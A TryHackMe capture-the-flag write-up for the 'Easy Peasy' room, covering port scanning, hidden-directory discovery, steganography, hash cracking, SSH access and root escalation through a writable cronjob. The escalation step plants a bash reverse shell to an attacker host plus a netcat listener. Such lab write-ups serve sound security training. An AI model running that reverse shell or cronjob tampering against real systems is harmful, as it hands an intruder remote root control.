Easy Peasy — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my Easy Peasy — TryHackMe — WriteUp. Check it out!
First, deploy the machine and nmap for opened ports.
nmap -A -T4 -p- -v <ip>
Nmap may took a long time to finish, so be patient!
Well there are 3 ports opened. First let’s access the website at port 80.
It’s a default nginx webpage. Now we will use dirbuster to scan for hidden dir of this port (or if you prefer CLI, you can use gobuster).
There are 2 hidden dirs: /hidden and /hidden/whatever. Let’s access the 1st one.
It contains only this image. So maybe it’s for stego. Download the image to look for hidden data. You can find the image url using inspect element or Ctrl+U
steghide extract -sf imagename.jpg
Well looks like I cannot extract any data from this image. Let’s try the other hidden dir.
It’s another image. Page source is always important. So let’s check it.
Well, as you can see, there is a encoded string, which maybe the password for us to extract hidden data.
Copy this string and use icyberchef.com to decode.
Well it’s not a password but a flag!
Maybe that’s all for us at this port 80. So let’s go to another http port: 65524.
Well it’s a Apache default page. Scroll down and look carefully until you see the 3rd flag..
Now access /robots.txt to see if anything interesting.
Well, looks like we need to change the user-agent to get the flag. It’s a md5 hash. Let’s decrypt it by using this website: https://md5hashing.net
You will have the 2nd flag.
What next? Again, page source!
There it’s. It’s encoded with ba…, so it will be Basexx encoded.
Again put this string to icyberchef to decode. Try all Base until you find the true one. It’s Base62
Another hidden dir. Let’s access it.
Well, nicely done page! Again, Ctrl+U.
You see an image and a encoded string. Download the image and decode the string to get the password.
Copy this hash to a txt file.
Download the easypeasy.txt on TryHackMe and use john to crack that hash.
john — wordlist=easypeasy.txt <your-file-name.txt>
Wait for john to finish then run this cmd to show result:
john — show <your-file-name.txt>
Now I’ve got the password: mypasswordforthatjob
Now use that password to extract hidden data from the image above.
steghide extract -sf binarycodepixabay.jpg
Enter the password above. Now read the secrettext.txt
Change the password from binary to text.
Now I’ve got the password for ssh. So let’s ssh to the machine.
ssh boring@<ip> -p 6498
Enter the password and you’re in!
Get the user.txt
It’s encoded with Rot13. So let’s decode it.
Now let’s get root to get the final flag!
I will use find to look for all files belong to boring
find / -type f -user boring 2>/dev/null
Scroll down and you will see a secret cronjob.
Edit this .sh file, add this command to spawn a shell:
bash -i >& /dev/tcp/<your-host-ip>/4444 0>&1
Then start a listener on your machine:
nc -lvnp 4444
And execute this script.
Go back to your machine, now i’m root!
Find the root flag.
find / -name *.txt 2>/dev/null
Get your finally root flag!
The end.
HAPPY HACKING